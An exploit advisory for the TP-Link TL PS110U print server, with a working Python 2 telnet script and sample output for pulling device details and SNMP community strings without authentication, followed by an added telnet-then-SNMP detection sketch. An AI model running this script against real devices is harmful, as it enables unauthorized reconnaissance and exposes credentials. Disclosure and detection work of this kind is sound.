
# Title : TP-Link Print Server TL PS110U - Sensitive Information Enumeration
# Published : 2013-06-19


# Exploit Title: TP-Link Print Server Sensitive Information Enumeration
# Exploit Author: SANTHO
# Vendor Homepage: http://www.tp-link.com
# Software Link: http://www.tp-link.com/en/products/details/?model=TL-PS110U
# Version: TL PS110U

The TP-Link TL PS110U print server runs a telnet service that lets an
attacker access the configuration details without authentication. The
PoC can extract the device name, MAC address, manufacturer name, printer
model, and SNMP community strings.

*Sample Output*

root@bt# ./tplink-enum.py 10.0.0.2
Device Name : 1P_PrintServABCD
Node ID : AA-AA-AA-AA-AA-AA
Manufacture: Hewlett-Packard
Model: HP LaserJet M1005
Community 1: public Read-Only
Community 2: public Read-Only

# Python 2 script (print statement, str-based telnetlib I/O)
import telnetlib
import sys

host = sys.argv[1]
tn = telnetlib.Telnet(host)

# The password prompt is answered with an empty line
tn.read_until("Password:")
tn.write("\r\n")

# Menu 1 -> 1: device name and node ID (MAC address)
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Device Name" in i:
        print i.strip()
    if "Node ID" in i:
        print i.strip()

# Back (0), then menu 2: attached printer manufacturer and model
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Manufacture:" in i:
        print i.strip()
    if "Model:" in i:
        print i.strip()

# Back (0), then menu 5: SNMP community strings
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Community" in i:
        print i.strip()
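
Because the telnet menu discloses the SNMP community strings, a defender can watch for telnet sessions to print servers and for SNMP queries that follow them from the same source. The detection sketch below is an added example, not part of the original advisory; the flow-record format, the inventory and allowlist addresses, and the 10-minute window are all assumptions, and the records are constructed.

```python
from datetime import datetime, timedelta

# Constructed flow records (assumed format): time src dst proto dport
SAMPLE_FLOWS = """\
2013-06-19T10:00:05 10.0.0.50 10.0.0.2 tcp 23
2013-06-19T10:00:40 10.0.0.50 10.0.0.2 udp 161
2013-06-19T10:05:00 10.0.0.10 10.0.0.2 tcp 23
2013-06-19T11:30:00 10.0.0.77 10.0.0.2 tcp 9100
2013-06-19T12:00:00 10.0.0.77 10.0.0.2 udp 161
2013-06-19T12:10:00 10.0.0.99 10.0.0.3 tcp 23
2013-06-19T13:00:00 10.0.0.60 10.0.0.2 tcp 23
2013-06-19T13:30:00 10.0.0.60 10.0.0.2 udp 161
"""
PRINT_SERVERS = {"10.0.0.2"}    # assumed inventory of print-server addresses
ADMIN_HOSTS = {"10.0.0.10"}     # assumed hosts allowed to manage them
WINDOW = timedelta(minutes=10)  # assumed telnet -> SNMP correlation window

def parse(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed records
        ts, src, dst, proto, dport = parts
        yield datetime.fromisoformat(ts), src, dst, proto, int(dport)

def detect(text):
    """Return sorted (severity, src, dst) alerts.
    'telnet'      : non-admin host opened TCP/23 to a print server
    'telnet+snmp' : same host then sent UDP/161 to it within WINDOW"""
    last_telnet = {}  # (src, dst) -> time of most recent telnet connection
    alerts = {}
    for ts, src, dst, proto, dport in sorted(parse(text)):
        if dst not in PRINT_SERVERS or src in ADMIN_HOSTS:
            continue
        key = (src, dst)
        if proto == "tcp" and dport == 23:
            last_telnet[key] = ts
            alerts.setdefault(key, "telnet")
        elif proto == "udp" and dport == 161 and key in last_telnet:
            if ts - last_telnet[key] <= WINDOW:
                alerts[key] = "telnet+snmp"
    return sorted((sev, s, d) for (s, d), sev in alerts.items())

if __name__ == "__main__":
    for alert in detect(SAMPLE_FLOWS):
        print(alert)
```

SNMP traffic with no preceding telnet session (10.0.0.77 in the sample) is not flagged, which keeps ordinary monitoring polls out of the alert list.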